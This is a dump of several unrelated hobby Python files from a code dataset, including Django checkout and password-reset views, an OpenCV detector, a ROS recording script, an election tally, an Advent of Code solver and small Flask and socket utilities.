cart_items=products.count()\n tested_delivery=OnDeliveryTransaction.objects.filter(made_by=user.profile.email)\n if tested_delivery.count()>=1:\n tasted=True\n else:\n tasted=False\n return render(request,'givers/checkout.html',{'fit':fit,'amount':amount,'gifts':products,'cart_items':cart_items,'delivery':delivery,'service_charge':service_charge,'tasted':tasted})\n\n\n\n\ndef password_reset_request(request):\n\tif request.method == \"POST\":\n\t\tpassword_reset_form = PasswordResetForm(request.POST)\n\t\tif password_reset_form.is_valid():\n\t\t\tdata = password_reset_form.cleaned_data['email']\n\t\t\tassociated_users = User.objects.filter(Q(email=data)|Q(username=data))\n\t\t\tif associated_users.exists():\n\t\t\t\tfor user in associated_users:\n\t\t\t\t\tsubject = \"Password Reset Requested\"\n\t\t\t\t\tplaintext = template.loader.get_template('password/password_reset_email.txt')\n\t\t\t\t\thtmltemp = template.loader.get_template('password/password_reset_email.html')\n\t\t\t\t\tc = {\n\t\t\t\t\t\"email\":user.email,\n\t\t\t\t\t'domain':'www.giveawaynow.com.ng',\n\t\t\t\t\t'site_name': 'Giveawaynow',\n\t\t\t\t\t\"uid\": urlsafe_base64_encode(force_bytes(user.pk)),\n\t\t\t\t\t\"user\": user,\n\t\t\t\t\t'token': default_token_generator.make_token(user),\n\t\t\t\t\t'protocol': 'https',\n\t\t\t\t\t}\n\t\t\t\t\ttext_content = plaintext.render(c)\n\t\t\t\t\thtml_content = htmltemp.render(c)\n\t\t\t\t\ttry:\n\t\t\t\t\t\tmsg = EmailMultiAlternatives(subject, text_content, settings.EMAIL_HOST_USER, [user.email], headers = {'Reply-To': settings.EMAIL_HOST_USER})\n\t\t\t\t\t\tmsg.attach_alternative(html_content, \"text/html\")\n\t\t\t\t\t\tmsg.send()\n\t\t\t\t\texcept BadHeaderError:\n\t\t\t\t\t\treturn HttpResponse('Invalid header found.')\n\t\t\t\t\tmessages.info(request, \"Password reset instructions have been sent to the email address entered.\")\n\t\t\t\t\treturn redirect (\"home\")\n\n\n\tpassword_reset_form = PasswordResetForm()\n\treturn render(request,\"password/password_reset.html\",{\"password_reset_form\":password_reset_form})\n\n\ndef activate(request, uidb64, token):\n try:\n uid = urlsafe_base64_decode(uidb64)\n user = UserModel._default_manager.get(pk=uid)\n except(TypeError, ValueError, OverflowError, User.DoesNotExist):\n user = None\n if user is not None and default_token_generator.check_token(user, token):\n user.is_active = True\n user.save()\n messages.success(request,'Thank you for your email confirmation. 
Now you can login your account.')\n return redirect('loginuser')\n else:\n return HttpResponse('Activation link is invalid!')\n\n\n\n\n@login_required(login_url='/login/')\ndef initiate_payment(request):\n cost=request.session.get('delivery')\n delivery_address=request.session.get('address')\n contact=request.session.get('contact')\n user = request.user\n trans=Transaction()\n a,b,c=final_checkout(trans,user,cost,delivery_address,contact)\n total=a['amount']\n paystack_charge=b\n service_charge=c\n transaction=Transaction.objects.create(**a)\n\n return render(request,'givers/make_payment.html',{'transaction':transaction,'paystack_public_key':settings.PAYSTACK_PUBLIC_KEY,\n 'logistics':cost,'charge':paystack_charge,'total':total,'service_charge':service_charge})\n\n@login_required(login_url='/login/')\ndef verify_payment(request,ref):\n user=request.user\n payment = get_object_or_404(Transaction,ref=ref)\n verified = payment.verify_payment()\n\n if verified:\n ShoppingCart.objects.filter(shopper=user.profile.email,status='in-cart').update(status='ordered')\n\n give=Give.objects.filter(gift_recipient=user.profile.email,gift_status='requested')\n for i in give:\n i.gift_status='ordered'\n i.save()\n messages.success(request, 'Payment Successful,you will be contacted soon for delivery')\n else:\n messages.error(request,\"Payment Failed.\")\n return redirect('user_account')\n\n\ndef my_mail(request):\n shape=request.session.get('selected')\n if request.method=='POST':\n form=SendEmailForm(request.POST)\n if form.is_valid:\n form.save(commit=False)\n\n msg=EmailMultiAlternatives('Dashme',form.cleaned_data.get('comment'),settings.EMAIL_HOST_USER,bcc=shape)\n msg.send()\n messages.success(request,'message sent')\n del request.session['selected']\n\n return redirect('/admin/givers/profile')\n\n\n@login_required(login_url='/login/')\ndef on_delivery_payment(request):\n user=request.user\n cost=request.session.get('delivery')\n delivery_address=request.session.get('address')\n contact=request.session.get('contact')\n trans=OnDeliveryTransaction()\n a,c=final_checkout(trans,user,cost,delivery_address,contact)\n amount=a['amount']\n\n OnDeliveryTransaction.objects.create(**a)\n latest_on_delivery=OnDeliveryTransaction.objects.filter(made_by=user).latest('made_on')\n ref=latest_on_delivery.ref\n messages.success(request,'you will be contacted soon for delivery')\n plaintext = template.loader.get_template('password/invoice.txt')\n vat=0.075*c\n amount=amount+vat\n c={\n 'amount':amount,\n 'ref':ref,\n 'ordered_giveaway':a['items'],\n 'service_charge':c,\n 'logistics':cost,\n 'vat':vat\n }\n text_content = plaintext.render(c)\n\n subject = \"Giveawaynow invoice\"\n msg = text_content\n to = request.user.email\n send_mail(subject, msg, settings.EMAIL_HOST_USER, [to])\n\n ShoppingCart.objects.filter(shopper=user.profile.email,status='in-cart').update(status='ordered')\n give=Give.objects.filter(gift_recipient=user.profile.email,gift_status='requested')\n for i in give:\n i.gift_status='ordered'\n i.save()\n\n return redirect('user_account')\n\n\ndef ad_text(request):\n return render(request,'password/ads.txt')","repo_name":"Shawen17/Dashme","sub_path":"givers/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":24357,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"22202742192","text":"import numpy as np\nimport cv2 as cv\nimport copy\nfrom scipy.ndimage.measurements import label\n\ndef binarise_otsu(img, b=1):\n '''\n Binarise 
image\n    \n    Parameters:\n    * img: grayscale image\n    \n    Output:\n    * binarised image\n    '''\n    # Get the shape (rows, cols)\n    size = np.shape(img)\n    size_batch = (int(size[0]/b), int(size[1]/b))\n    \n    for i in range(b):\n        for j in range(b):\n            y0 = size_batch[0] * j\n            y1 = size_batch[0] * (j + 1)\n            x0 = size_batch[1] * i\n            x1 = size_batch[1] * (i + 1)\n            crop = img[y0:y1,x0:x1]\n            ret, thresh = cv.threshold(crop,0,255,cv.THRESH_OTSU)\n            img[y0:y1,x0:x1] = thresh\n    return img\n\ndef locate_maxima(img, k):\n    '''\n    Computes the local maxima through dilation and opening\n    \n    Parameters:\n    * img: binary image from binarisation\n    * k: kernel size\n    \n    Returns:\n    * opening: a binary image with local maxima\n    \n    '''\n    kernel = np.ones((k,k),np.uint8)\n    opening = cv.dilate(img,kernel,iterations=1)\n    opening = cv.morphologyEx(opening,cv.MORPH_OPEN, kernel, iterations = 2)\n    ret, opening = cv.threshold(opening,0,255,cv.THRESH_OTSU)\n    return opening\n\ndef compute_k(size):\n    '''\n    Computes the kernel size for the maxima\n    \n    Standard playground size: 2560 × 1920, k0 = 17\n    Minimum: 450 x 340\n    '''\n    # Standard playground\n    k0 = 17\n    w0 = 2560\n    h0 = 1920\n    w_min = 450\n    h_min = 340\n\n    h = size[0]\n    w = size[1]\n    \n    # If the image gives a k < 3, just return 3\n    if h <= h_min and w <= w_min:\n        return 3\n    \n    k1_1 = h * k0 / h0\n    k1_2 = w * k0 / w0\n    \n    k1 = int((k1_1 + k1_2) / 2)\n    \n    # Is it even?\n    if (k1 % 2) == 0:\n        k1 += 1\n    \n    return k1\n\ndef get_bbs(labels, padding=32, min_size=16, max_size=64):\n    \"\"\"\n    Get the BBoxes list\n    \"\"\"\n    bb_list = list([])\n    for i in range(1, labels[1]+1):\n        # Find pixels with each car label value\n        nonzero = (labels[0] == i).nonzero()\n        # Identify x and y values of those pixels\n        nonzeroy = np.array(nonzero[0])\n        nonzerox = np.array(nonzero[1])\n        # Define a bounding box based on min/max x and y\n        # (check the width with nonzerox and the height with nonzeroy)\n        if (np.max(nonzerox) - np.min(nonzerox)) >= min_size and (np.max(nonzerox) - np.min(nonzerox)) < max_size \\\n            and (np.max(nonzeroy) - np.min(nonzeroy)) >= min_size and (np.max(nonzeroy) - np.min(nonzeroy)) < max_size:\n            bbox = ((np.min(nonzerox)-padding, np.min(nonzeroy)-padding), (np.max(nonzerox)+padding, np.max(nonzeroy)+padding))\n            bb_list.append((bbox[0], bbox[1]))\n    return bb_list\n\ndef compute_padding(size):\n    '''\n    Computes the padding size for the bboxes\n    \n    Standard playground size: 1280 × 960, p0 = 32\n    '''\n    # Reference playground\n    p0 = 32\n    w0 = 1280\n    h0 = 960\n\n    h = size[0]\n    w = size[1]\n    \n    p1_1 = h * p0 / h0\n    p1_2 = w * p0 / w0\n    \n    p1 = int((p1_1 + p1_2) / 2)\n    \n    return p1\n\ndef label_boxes(markers, size=None, padding=None):\n    '''\n    Draw the bounding boxes adding a padding, since the morphological\n    operations make the elements smaller than they actually are.\n\n    Return the bounding boxes\n    On a playground, the sizes are:\n\n    padding: 32\n    min_size: padding / 2\n    max_size: padding * 4\n    '''\n    min_size_factor = 0.5\n    max_size_factor = 4\n\n    # np.float was removed from NumPy; the builtin float is the equivalent\n    heat = np.zeros_like(markers[:,:]).astype(float)\n    heat[markers == 1] = 255\n\n    labels = label(heat)\n    \n    if size is None:\n        size = np.shape(heat)\n\n    if padding is None:\n        padding = compute_padding(size)\n\n    bb_list = get_bbs(labels, padding, padding * min_size_factor,\n                      padding * max_size_factor)\n    \n    return bb_list\n\ndef bounding_boxes(negative, size=None, padding=None):\n    negative[negative == 255] = 1\n    bb_list = label_boxes(negative, size, padding)\n    return bb_list\n\ndef add_offset(roi, offset):\n    '''\n    Add the proper offset to the roi\n\n    Parameters:\n    * roi: bounding box referred to another bounding 
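# End-to-end use of this detector on a single frame: detect(), defined a few
# lines below, returns ((x1, y1), (x2, y2)) pairs that cv.rectangle can draw
# directly. The file names and the batches value are illustrative.
import cv2 as cv

frame = cv.imread("playground.png")               # hypothetical input image
gray = cv.cvtColor(frame, cv.COLOR_BGR2GRAY)
for p1, p2 in detect(gray, batches=2):
    cv.rectangle(frame, p1, p2, (0, 255, 0), 2)   # draw each detection
cv.imwrite("playground_boxes.png", frame)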
box\n * offset: offset of the outter bounding box\n\n Returns:\n * new roi in the global image\n '''\n p1 = (roi[0][0] + offset[0], roi[0][1] + offset[1])\n p2 = (roi[1][0] + offset[0], roi[1][1] + offset[1])\n return [p1, p2]\n\ndef detect(img, batches=2, size=None, ROI=None, padding=None):\n '''\n Performs the detection by using binarisation and thresholding. It's\n principle is based on Otsu's thresholding followed by local maxima\n detection and thresholding again to make it binary.\n \n Parameters:\n \n img: grayscale image\n ROI: Detection zone\n \n Return:\n \n bboxes\n '''\n # Select per ROI detection\n add_offset_sw = False\n offset = None\n\n if not ROI is None:\n img_roi = img[ROI[1]:ROI[3],ROI[0]:ROI[2]]\n offset = (ROI[0], ROI[1])\n add_offset_sw = True\n else:\n img_roi = img\n\n # Binarise image with otsu with 4 windows (2^2)\n otsu = binarise_otsu(img_roi, batches)\n\n if size is None:\n size = np.shape(otsu)\n\n # Locate the maxima\n k = compute_k(np.shape(otsu))\n maxima = locate_maxima(otsu, k)\n # Get the bounding boxes\n bbs = bounding_boxes(maxima, size, padding)\n\n # Add offset if needed\n if add_offset_sw:\n for i in range(len(bbs)):\n bbs[i] = add_offset(bbs[i], offset)\n return bbs\n\ndef roi_chopper(gray, bbox):\n '''\n Crops the image to get the ROI of interest for the subdetection\n\n Parameters:\n * gray: grayscale image\n * bbox: bounding box to crop\n\n Returns:\n * cropped ROI\n '''\n # Crop the image to the roi\n p1, p2 = bbox\n\n x1, y1 = p1\n x2, y2 = p2\n if x1 < 0:\n x1 = 0\n if y1 < 0:\n y1 = 0\n \n roi_gray = gray[y1:y2, x1:x2]\n return roi_gray, (x1, y1)\n\ndef detect_within_roi(gray, bbs):\n '''\n Gets new bounding boxes withing the global detections/tracking elements\n\n Parameters:\n * gray: grayscale image\n * bbs: bounding boxes to detect within the gray image\n\n Returns:\n * new bounding boxes with the proper offset\n '''\n detection_offset_bbs = []\n for bbox in bbs:\n \n roi_gray, offset = roi_chopper(gray, bbox)\n \n # Detect within roi\n if roi_gray.shape[0] == 0 or roi_gray.shape[1] == 0:\n continue\n \n size = (int(gray.shape[0] / 2), int(gray.shape[1] / 2))\n detection_bbs = detect(roi_gray, 1, size)\n for i in detection_bbs:\n detection_offset_bbs.append(add_offset(i, offset))\n \n return detection_offset_bbs\n","repo_name":"lleon95/NanoSciTracker-Python","sub_path":"src/LocalTracker/detector.py","file_name":"detector.py","file_ext":"py","file_size_in_byte":6496,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"22910244604","text":"import argparse\nimport signal\n\nimport baxter_interface\nimport rospy\nimport scipy.io as sio\nimport math\n\nfrom trajectory_recorder import TrajectoryRecorder\n\nfrom robot_serving.msg import Cups\n\n_x_target = float()\n_y_target = float()\n_z_target = float()\n_stop = False\n\n\ndef signal_handler(signum, frame):\n if signum == signal.SIGINT:\n rospy.loginfo(\"Interruption from user.\")\n exit()\n elif signum == signal.SIGSEGV:\n rospy.loginfo(\"Internal error detected.\")\n raise OSError(\"Caught a SIGSEGV during execution of cup_filling_task_recording.\")\n else:\n rospy.loginfo(\"Unexpected error caught.\")\n raise OSError(\"Caught a \" + str(signal.SIGSEGV) + \" during execution of cup_filling_task_recording.\")\n\n\ndef timer_callback(event):\n global _stop\n if not _stop:\n dist = math.sqrt(math.pow(_x_target, 2) + math.pow(_y_target, 2) + math.pow(_z_target, 2))\n rospy.loginfo(\"Target Pos: (\" + str(_x_target) + \", \" + 
str(_y_target) + \", \" + str(_z_target) + \")\")\n rospy.loginfo(\"Dist: \" + str(dist))\n rospy.loginfo(\"\\n\\n\\n\")\n\n\ndef get_pos_callback(msg):\n if msg.cups_pos_x > 0:\n global _x_target\n global _y_target\n global _z_target\n\n _z_target = msg.cups_pos_z[0]\n _y_target = msg.cups_pos_y[0]\n _x_target = msg.cups_pos_x[0]\n\n\ndef init_ros_vars():\n # Init ROS and baxter stuff\n rospy.init_node('cup_filling_task_recording')\n rospy.loginfo('cup_filling_task_recording: init: Node initialized.')\n rospy.Subscriber('/vision_processing/cups_pub', Cups, get_pos_callback)\n rospy.Timer(rospy.Duration(2), timer_callback)\n\n\ndef init_baxter_vars():\n limbs = {'left': baxter_interface.Limb('left'),\n 'right': baxter_interface.Limb('right')}\n return limbs\n\n\ndef init_recording_vars():\n\n rec = TrajectoryRecorder('right', 100)\n return rec\n\n\ndef before_record(limbs):\n starting_position = {\n 'left': {\n 'left_s0': 0.5721748332275391,\n 'left_s1': 0.2784175126831055,\n 'left_w0': 0.13038836682128907,\n 'left_w1': 0.730558349395752,\n 'left_w2': -1.0507768385009766,\n 'left_e0': -1.047708876928711,\n 'left_e1': 2.012199296209717\n },\n 'right': {\n 'right_s0': -0.4460049135681153,\n 'right_s1': 0.03873301484985352,\n 'right_w0': -0.18292720874633792,\n 'right_w1': 0.6446554253723145,\n 'right_w2': -1.5370487477050783,\n 'right_e0': 1.5604419546936037,\n 'right_e1': 2.1698158219848636\n }\n }\n\n for limb_name, limb in limbs.items():\n limb.move_to_joint_positions(starting_position[limb_name])\n\n\ndef post_record(traj, target, output_filename):\n sio.savemat(output_filename, {'traj': traj, 'target': target}) \n \n\ndef task_recording():\n\n signal.signal(signal.SIGINT, signal_handler)\n signal.signal(signal.SIGSEGV, signal_handler)\n\n # Setup parser\n parser = argparse.ArgumentParser()\n parser.add_argument('-o', '--output',\n help='Name of output file',\n type=str,\n required=True)\n args = parser.parse_args()\n output_filename = args.output\n\n init_ros_vars()\n rospy.loginfo('\\ncup_filling_task_recording: main: Make sure gripper_control is running.')\n rospy.loginfo('Press Enter when ready.\\n')\n\n raw_input()\n limbs = init_baxter_vars()\n before_record(limbs)\n\n rospy.loginfo('\\ncup_filling_task_recording: main: Place cup in a visible and reachable position.')\n rospy.loginfo('Press Enter to continue.\\n')\n\n raw_input()\n rec = init_recording_vars()\n rospy.loginfo('\\ncup_filling_task_recording: main: Wait for target detection to be stable')\n rospy.loginfo('Press Enter to continue.\\n')\n\n raw_input()\n global _stop\n _stop = True\n target = [_x_target, _y_target, _z_target]\n trajectory = rec.record()\n\n post_record(trajectory, target, output_filename)\n\n\nif __name__ == '__main__':\n task_recording()\n","repo_name":"miguel-faria/robot-serving","sub_path":"trajectory_recording/cup_filling_task_recording.py","file_name":"cup_filling_task_recording.py","file_ext":"py","file_size_in_byte":4075,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"22240813826","text":"import csv, os\r\n\r\n## this didnt run the right file when Ian and I ran from VS code...had to run it from command prompt\r\n## got differnt total number of votes in VS Code vs. 
command prompt (correct number in command prompt)\r\n\r\n#creating variables to import as .csv and export as .txt\r\ncsvpath = os.path.join(\"Resources\", \"PyPoll_Resources_election_data.csv\")\r\nanalyzed_data = os.path.join(\"Resources\", \"election_results2.txt\")\r\n\r\n#read in as csv file\r\nwith open(csvpath, newline='') as csvfile:\r\n csvreader = csv.reader(csvfile, delimiter=',')\r\n #print(csvreader)\r\n csv_header = next(csvreader)\r\n \r\n #Defining lists\r\n votes = []\r\n county = []\r\n\r\n candidates = []\r\n\r\n khan = []\r\n correy = []\r\n li = []\r\n otooley = []\r\n\r\n\r\n for row in csvreader:\r\n votes.append(row[0])\r\n county.append(row[1])\r\n candidates.append(row[2])\r\n\r\n #total number of votes\r\n total_votes = (len(votes))\r\n #print(total_votes)\r\n\r\n #how many votes each person won\r\n for c in candidates:\r\n if c == \"Khan\":\r\n khan.append(candidates)\r\n khan_votes = len(khan)\r\n elif c == \"Correy\":\r\n correy.append(candidates)\r\n correy_votes = len(correy)\r\n elif c == \"Li\":\r\n li.append(candidates)\r\n li_votes = len(li)\r\n else:\r\n otooley.append(candidates)\r\n otooley_votes = len(otooley)\r\n #print(khan_votes)\r\n #print(correy_votes)\r\n #print(li_votes)\r\n #print(otooley_votes)\r\n \r\n \r\n #votes received percentages\r\n khan_percent = round(((khan_votes / total_votes) * 100), 2)\r\n correy_percent = round(((correy_votes / total_votes) * 100), 2)\r\n li_percent = round(((li_votes / total_votes) * 100), 2)\r\n otooley_percent = round(((otooley_votes / total_votes) * 100), 2)\r\n #print(khan_percent)\r\n #print(correy_percent)\r\n #print(li_percent)\r\n #print(otooley_percent)\r\n \r\n #Winner \r\n if khan_percent > max(correy_percent, li_percent, otooley_percent):\r\n winner = \"Khan\"\r\n elif correy_percent > max(khan_percent, li_percent, otooley_percent):\r\n winner = \"Correy\" \r\n elif li_percent > max(correy_percent, khan_percent, otooley_percent):\r\n winner = \"Li\"\r\n else:\r\n winner = \"O'Tooley\"\r\n\r\n#Print Statements\r\n\r\nresults2 = (\r\nf\"Election Results\\n\"\r\nf\"-----------------------------------\\n\"\r\nf\"Total Votes: {total_votes}\\n\"\r\nf\"-----------------------------------\\n\"\r\nf\"Khan: {khan_percent}% ({khan_votes})\\n\"\r\nf\"Correy: {correy_percent}% ({correy_votes})\\n\"\r\nf\"Li: {li_percent}% ({li_votes})\\n\"\r\nf\"O'Tooley: {otooley_percent}% ({otooley_votes})\\n\"\r\nf\"-----------------------------------\\n\"\r\nf\"Winner: {winner}\\n\"\r\nf\"-----------------------------------\\n\"\r\n)\r\n\r\nprint(results2)\r\n\r\nwith open(analyzed_data, 'w') as txt_file:\r\n txt_file.write(results2)","repo_name":"cmc5953/python-challenge","sub_path":"python-challenge/PyPoll/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2865,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"41615702852","text":"from collections import defaultdict\nimport dataclasses\n\n# You start with 50 hit points and 500 mana points.\nyou = (50, 0, 0, 500)\n\nboss = (58, 0, 9, 0)\n\n'''\n Magic Missile costs 53 mana. It instantly does 4 damage.\n Drain costs 73 mana. It instantly does 2 damage and heals you for 2 hit points.\n Shield costs 113 mana. It starts an effect that lasts for 6 turns. While it is active, your armor is increased by 7.\n Poison costs 173 mana. It starts an effect that lasts for 6 turns. At the start of each turn while it is active, it deals the boss 3 damage.\n Recharge costs 229 mana. 
It starts an effect that lasts for 5 turns. At the start of each turn while it is active, it gives you 101 new mana.\n'''\n\n\ndef attack_damage(damage, armor):\n return 1 if damage <= armor else (damage - armor)\n\n@dataclasses.dataclass\nclass Effect:\n name: str\n mana_cost: int\n duration: int\n damage: int = 0\n heal: int = 0\n poison: int = 0\n armor: int = 0\n add_mana: int = 0\n\n\neffects_list = [\n Effect(name='Magic Missile', mana_cost=53, duration=1, damage=4),\n Effect(name='Drain', mana_cost=73, duration=1, damage=2, heal=2),\n Effect(name='Shield', mana_cost=113, duration=6, armor=7),\n Effect(name='Poison', mana_cost=173, duration=6, poison=3),\n Effect(name='Recharge', mana_cost=229, duration=5, add_mana=101),\n]\nmin_mana_cost = min([e.mana_cost for e in effects_list]) # cheapest castable spell\neffect_names = list(sorted([e.name for e in effects_list]))\n\n# What is the least amount of mana you can spend and still win the fight?\n# (Do not include mana recharge effects as \"spending\" negative mana.)\n\n\ndef state_to_str(state):\n you, boss, _, effects = state\n es = []\n for name in effect_names:\n if name in effects:\n duration, _ = effects[name]\n es.append(f'{name}:{duration}')\n return f'{you} {boss} {\",\".join(es)}'\n\nBIG_NUM = int(1e6)\nbest_mana_cost = BIG_NUM\nstep = 0\nstate = {step: (you, boss, 0, {})}\naction = defaultdict(str)\nmemo = {}\n\n\ndef run(step):\n global state, effects_list, best_mana_cost\n print(step)\n state_str = state_to_str(state[step])\n if state_str in memo:\n return memo[state_str]\n (your_hit_points, your_damage, your_armor, your_mana), (boss_hit_points, boss_damage, boss_armor, boss_mana), mana_spent, effects = state[step]\n if mana_spent > best_mana_cost:\n return BIG_NUM\n if your_mana < min_mana_cost:\n return BIG_NUM # If you cannot afford to cast any spell, you lose.\n step += 1\n # apply old effects and drop expired\n effects = dict(effects)\n for name in list(effects.keys()):\n duration, effect = effects[name]\n boss_hit_points -= effect.poison # apply poison\n your_mana += effect.add_mana # recharge\n if duration <= 1:\n your_armor -= effect.armor\n del effects[name]\n else:\n effects[name] = (duration - 1, effect)\n # lose or win?\n if boss_hit_points <= 0:\n if mana_spent < best_mana_cost: # print the trace only when it beats the best so far\n print('\\n\\n\\n')\n for i in range(0, step):\n print(i, action[i])\n best_mana_cost = min(best_mana_cost, mana_spent)\n return mana_spent\n # boss attacks\n if step % 2 == 0:\n your_hit_points -= attack_damage(boss_damage, your_armor)\n if your_hit_points <= 0:\n return BIG_NUM\n state[step] = ((your_hit_points, your_damage, your_armor, your_mana), (boss_hit_points, boss_damage, boss_armor, boss_mana), mana_spent, effects)\n return run(step)\n # cast new spell\n you_win = False\n if step % 2 == 1:\n for effect in effects_list:\n effects2 = dict(effects)\n your_hit_points2, your_damage2, your_armor2, your_mana2 = your_hit_points, your_damage, your_armor, your_mana\n boss_hit_points2, boss_damage2, boss_armor2, boss_mana2 = boss_hit_points, boss_damage, boss_armor, boss_mana\n mana_spent2 = mana_spent\n if effect.name in effects: # still in effect\n continue\n action[step] = effect.name\n effects2[effect.name] = (effect.duration, effect)\n mana_spent2 += effect.mana_cost\n your_mana2 -= effect.mana_cost\n boss_hit_points2 -= effect.damage # spell damage ignores armor; attack_damage() would deal 1 even for 0-damage spells\n your_hit_points2 += effect.heal # Drain heals you, so hit points go up\n if your_hit_points2 <= 0:\n print('\\n\\n\\n')\n for i in range(0, step):\n print(i, action[i])\n best_mana_cost = min(best_mana_cost, your_mana2)\n elif boss_hit_points2 
<= 0:\n you_win = True\n else:\n you2 = your_hit_points2, your_damage2, your_armor2, your_mana2\n boss2 = boss_hit_points2, boss_damage2, boss_armor2, boss_mana2\n state[step] = (you2, boss2, mana_spent2, effects2)\n if run(step):\n you_win = True\n memo[state_str] = you_win\n return you_win\n\nrun(0)\nprint(best_mana_cost)\n\n","repo_name":"vashu1/data_snippets","sub_path":"_tasks/advent2015/d22.py","file_name":"d22.py","file_ext":"py","file_size_in_byte":5014,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"57"} +{"seq_id":"7037837595","text":"import sys\nimport socket\nimport threading\n\n\nclass NetEcho(threading.Thread):\n \"\"\" This class aims to replace 'nc -e' or 'nc -c' calls in some tests \"\"\"\n\n def __init__(self, host='localhost', port=0, echo='DEFAULT'):\n super(NetEcho, self).__init__()\n self.port = port\n self.host = host\n self.echo = echo\n self.server_socket = self._create_server_socket()\n self.running = True\n\n def _create_server_socket(self):\n try:\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n s.settimeout(1) # so to not block indefinitely in accept()..\n s.bind((self.host, self.port))\n if not self.port:\n self.port = s.getsockname()[1]\n except Exception as err:\n print('Could not prepare socket %s' % err)\n raise\n s.listen(5)\n return s\n\n def stop(self):\n self.running = False\n\n def run(self):\n while self.running:\n try:\n client, address = self.server_socket.accept()\n except socket.error:\n pass\n else:\n break\n else:\n return\n rec = client.recv(1024)\n client.send(self.echo)\n client.close()\n self.server_socket.close()\n","repo_name":"savoirfairelinux/monitoring-tools","sub_path":"libs/shinkenplugins/shinkenplugins/tools/tests/netecho.py","file_name":"netecho.py","file_ext":"py","file_size_in_byte":1370,"program_lang":"python","lang":"en","doc_type":"code","stars":28,"dataset":"github-code","pt":"57"} +{"seq_id":"13396101831","text":"from pyswip import Prolog\n\nprolog = Prolog()\nprolog.consult('bucket_refill.pl')\n\n\nwhile True:\n limits = input(\"Enter jar limits. It should be a comma-separated or space-separated list of positive integers\\n\")\n limits = limits.replace(',', ' ')\n limits = limits.strip().split()\n limits = list(map(int, limits))\n goal = int(input(\"\"\"Enter target volume of water\\n\"\"\").strip())\n print(\"Calculating...\")\n if any(True for _ in prolog.query(f'solve_silent({limits}, {goal})')):\n print(\"It's possible! 
See solution:\")\n next(prolog.query(f'solve({limits}, {goal})'))\n else:\n print(\"It's impossible :(\")\n\n print()","repo_name":"mstrechen/labs","sub_path":"Intelectual systems [8th semester] /lab2/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":652,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"30863390866","text":"import pickle\n\nmodeline = pickle.load(open(\"HousePricePredictionModel.pkl\", \"rb\"))\n\ndef predictPrice(longitude: float, latitude: float, housingMedianAge: float, totalRooms: float, totalBedrooms: float,\n population: float, households: float, medianIncome: float, oceanProximity: str, bedroom_ratio: float,\n household_rooms: float):\n\n price = 0\n if oceanProximity == \"INLAND\":\n price = modeline.predict([[longitude, latitude, housingMedianAge, totalRooms, totalBedrooms, population,\n households, medianIncome, 0, 1, 0, 0, 0, bedroom_ratio, household_rooms]])\n elif oceanProximity == \"ISLAND\":\n price = modeline.predict([[longitude, latitude, housingMedianAge, totalRooms, totalBedrooms, population,\n households, medianIncome, 0, 0, 1, 0, 0, bedroom_ratio, household_rooms]])\n elif oceanProximity == \"NEAR BAY\":\n price = modeline.predict([[longitude, latitude, housingMedianAge, totalRooms, totalBedrooms, population,\n households, medianIncome, 0, 0, 0, 1, 0, bedroom_ratio, household_rooms]])\n elif oceanProximity == \"NEAR OCEAN\":\n price = modeline.predict([[longitude, latitude, housingMedianAge, totalRooms, totalBedrooms, population,\n households, medianIncome, 0, 0, 0, 0, 1, bedroom_ratio, household_rooms]])\n else:\n price = modeline.predict([[longitude, latitude, housingMedianAge, totalRooms, totalBedrooms, population,\n households, medianIncome, 1, 0, 0, 0, 0, bedroom_ratio, household_rooms]])\n return price\n\n","repo_name":"Abhijit28012002/MLOPs_Flask_Project","sub_path":"HousePricePredict.py","file_name":"HousePricePredict.py","file_ext":"py","file_size_in_byte":1741,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"73414529777","text":"from models.tasks.task_factory import TaskFactory\nfrom flask import jsonify, request, Blueprint\n\nfrom flask_jwt_extended import get_jwt_identity, jwt_required\n\nimport logging\n\nlogging.basicConfig(level=logging.INFO)\nlogger = logging.getLogger(__name__)\n\ntasks = Blueprint(\"tasks\", __name__)\n\n\n@tasks.route(\"/\", methods=[\"POST\"])\n@jwt_required\ndef set_rules_for_device(task_type):\n income_json = request.json\n device_id = income_json.get('device_id')\n lines = income_json.get('lines')\n\n Task = TaskFactory.get_serializer(task_type)\n\n device_task = Task.calculate(device_id, lines)\n device_task.register()\n\n return jsonify(tasks=device_task)\n\n\n@tasks.route(\"/\", methods=[\"DELETE\"])\n# @jwt_required\ndef delete_rules_for_device(device_id):\n income_json = request.json\n\n device_task = DeviceTask.get_by_id(device_task_id=income_json[\"lines\"])\n device_task = device_task.cancel()\n\n return \"OK\"\n\n\n@tasks.route(\"//\", methods=[\"GET\"])\n# @jwt_required\ndef get_all_tasks(date_start, date_end):\n cr_user = get_jwt_identity()\n return \"OK\"\n\n\n@tasks.route(\n \"//\", methods=[\"GET\"]\n)\n@jwt_required\ndef get_rules_for_device(device_id):\n cr_user = get_jwt_identity()\n\n # to check device exists\n Device.get_by_id(device_id=device_id, user_identity=cr_user)\n\n tasks = DeviceTask.get_next_task_by_device_id(device_id=device_id)\n\n return 
